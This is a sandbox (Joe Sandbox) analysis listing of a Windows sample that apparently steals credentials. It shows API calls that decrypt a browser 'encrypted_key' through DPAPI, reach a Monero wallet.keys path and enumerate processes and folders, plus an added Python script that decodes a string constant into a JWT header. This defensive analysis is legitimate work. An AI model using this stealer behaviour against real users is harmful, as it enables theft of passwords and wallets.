                  • Opcode Fuzzy Hash: 0d9b4415bfcc4d885e54e1e2acf7bea123ea3edb0e2f43f18ac95e336ba59dbc
                  • Instruction Fuzzy Hash: C181EFB19201089BCB14FBA4DD56DFEB338AF14780F504538F60BA6091EF746A29DF62
                  Strings
                  • s/, xrefs: 002F7111
                  • s/, xrefs: 002F72AE, 002F7179, 002F717C
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002F718C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: s/$s/$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-1218915482
                  • Opcode ID: 86d957f8b0354ac769be2803197e70e997e829955587f017158ba3627b4bcbfe
                  • Instruction ID: 47d50220f9ed86271d9c7041711738cc785267d44bfce3b1908347a806e53701
                  • Opcode Fuzzy Hash: 86d957f8b0354ac769be2803197e70e997e829955587f017158ba3627b4bcbfe
                  • Instruction Fuzzy Hash: CE517BB0C2421DABDB14EB90DC95BFEF374AF14340F1041A8E60966181EB746A98CF54
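The third string at xref 002F718C is printed by the plugin as space-separated hex bytes. Decoding it takes two steps: the bytes are ASCII text, and that text is itself unpadded base64. The script below is an added example (not part of the Joe Sandbox report) that peels such dumps layer by layer; on this string it yields eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0 and then { "typ": "JWT", "alg": "EdDSA" }, i.e. a JSON Web Token header declaring EdDSA signatures. Which application's tokens the sample compares against is not established by this listing alone; the decoder only shows what the constant is.

```python
"""Added example: peel the hex-dumped string constant at xref 002F718C.
Not part of the report; it only decodes what the listing prints."""
import base64
import binascii
import string
from typing import List, Optional

# Copied from the "Strings" entry above (plugin output, bytes as space-separated hex).
HEX_DUMPED = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
              "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")

_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/")
_PRINTABLE = set(string.printable.encode())


def hex_dump_to_bytes(dump: str) -> bytes:
    """'65 79 41' -> b'eyA' (tolerates the plugin's spacing)."""
    return bytes.fromhex("".join(dump.split()))


def try_base64(text: str) -> Optional[bytes]:
    """Decode if text is (possibly unpadded) base64 whose plaintext is printable."""
    body = text.rstrip("=")
    if len(body) < 8 or not set(body) <= _B64_ALPHABET:
        return None
    try:
        out = base64.b64decode(body + "=" * (-len(body) % 4), validate=True)
    except binascii.Error:
        return None
    return out if out and set(out) <= _PRINTABLE else None


def peel(dump: str) -> List[bytes]:
    """Return every decoding layer: [raw bytes, base64-decoded, ...].
    Stops when a layer is not ASCII, not base64, or repeats an earlier layer."""
    layers = [hex_dump_to_bytes(dump)]
    while True:
        try:
            text = layers[-1].decode("ascii")
        except UnicodeDecodeError:
            return layers
        nxt = try_base64(text)
        if nxt is None or nxt in layers:
            return layers
        layers.append(nxt)


if __name__ == "__main__":
    for depth, layer in enumerate(peel(HEX_DUMPED)):
        print(depth, layer)
```

The printable-plaintext check is what stops the loop at the JSON header: it contains braces, spaces and quotes, so it is not fed back into the base64 decoder.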
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 4272d0537a965ab5f0de448e066a7377676f4a577232f7b8abebcabc9f84d515
                  • Instruction ID: 5bee3f22a71acd4a6df81619fdbc6319d6b3a354639978de214a0f46b1521de4
                  • Opcode Fuzzy Hash: 4272d0537a965ab5f0de448e066a7377676f4a577232f7b8abebcabc9f84d515
                  • Instruction Fuzzy Hash: CC4142B1D2010DEBCB04EFA4D955AFEF778AF54744F008028E616B6290DB746A19CFA5
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002E9D39
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                    • Part of subcall function 002E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
                    • Part of subcall function 002E9AC0: LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                    • Part of subcall function 002E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002E9B84
                    • Part of subcall function 002E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 002E9BA3
                    • Part of subcall function 002E9B60: LocalFree.KERNEL32(?), ref: 002E9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: c0389d4d615502c7c39057412fa86a0aeb01eda9019db6c587ca6b98c96e882e
                  • Instruction ID: ec17767fd2dba595aec0d45389c3a04dad1557dea7b908cb350eb8e45839293e
                  • Opcode Fuzzy Hash: c0389d4d615502c7c39057412fa86a0aeb01eda9019db6c587ca6b98c96e882e
                  • Instruction Fuzzy Hash: D13161B5D2020DABCF04EFE5DC85AEFB7B8AF48304F544569E905A3241E7309A64CBA1
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003005B7), ref: 002F86CA
                  • Process32First.KERNEL32(?,00000128), ref: 002F86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 002F86F3
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • CloseHandle.KERNEL32(?), ref: 002F8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3dd9f751d1cbc0ba5b7ea2f9642579aeb2f67bb506c1774c9f63147dcd69c649
                  • Instruction ID: fc0c1fd688488dfb6c405906b0a8216933aef9a0dfd70db18174d2906a0b1516
                  • Opcode Fuzzy Hash: 3dd9f751d1cbc0ba5b7ea2f9642579aeb2f67bb506c1774c9f63147dcd69c649
                  • Instruction Fuzzy Hash: 19316DB192121CABCB24EF50CC45FEEF778EF45780F1041A9E20EA61A0DB706A55CFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00300E00,00000000,?), ref: 002F79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00300E00,00000000,?), ref: 002F79C4
                  • wsprintfA.USER32 ref: 002F79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 41fe66bd3db795dd068ff0a0abc40ea33a6333dd98b0558ba5612fcd865f8d4d
                  • Instruction ID: 660e2df9dcc4ed907f3e750b1a52b9a8c47ca6e6a974e0aee0e70a0a515e2382
                  • Opcode Fuzzy Hash: 41fe66bd3db795dd068ff0a0abc40ea33a6333dd98b0558ba5612fcd865f8d4d
                  • Instruction Fuzzy Hash: 861127B2904118ABCB24DFC9DD45BBEB7F8FB4DB11F10421AF605A2280E3795945DBB1
                  APIs
                  • __getptd.LIBCMT ref: 002FC74E
                    • Part of subcall function 002FBF9F: __amsg_exit.LIBCMT ref: 002FBFAF
                  • __getptd.LIBCMT ref: 002FC765
                  • __amsg_exit.LIBCMT ref: 002FC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002FC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 44bb7346a742c85d3333af831ffd58d02ad0e505a62c41818054c1846f40f697
                  • Instruction ID: 87a673a6930a08de35576da50e02d47d68433ec0f5c55eeffe31898b222eb590
                  • Opcode Fuzzy Hash: 44bb7346a742c85d3333af831ffd58d02ad0e505a62c41818054c1846f40f697
                  • Instruction Fuzzy Hash: 31F0F63292530D9BD7227F789D02B79F3A45F007A0F300279F304A61D2CB641860DE46
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4F7A
                  • lstrcat.KERNEL32(?,00301070), ref: 002F4F97
                  • lstrcat.KERNEL32(?,01328B90), ref: 002F4FAB
                  • lstrcat.KERNEL32(?,00301074), ref: 002F4FBD
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F492C
                    • Part of subcall function 002F4910: FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                    • Part of subcall function 002F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                    • Part of subcall function 002F4910: FindClose.KERNEL32(000000FF), ref: 002F4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 25bac686a29cb21ccbed0e90577df9d44f60540450b50faae1d35b710ebf4905
                  • Instruction ID: 338f8481492a2377ef499f07eb337a81d277ed33cc70bdc2c698872876cab0c8
                  • Opcode Fuzzy Hash: 25bac686a29cb21ccbed0e90577df9d44f60540450b50faae1d35b710ebf4905
                  • Instruction Fuzzy Hash: 4121C876A1020867CB64FB70DC56EEE733CAF65300F404554F65992181EEB49ADD8F92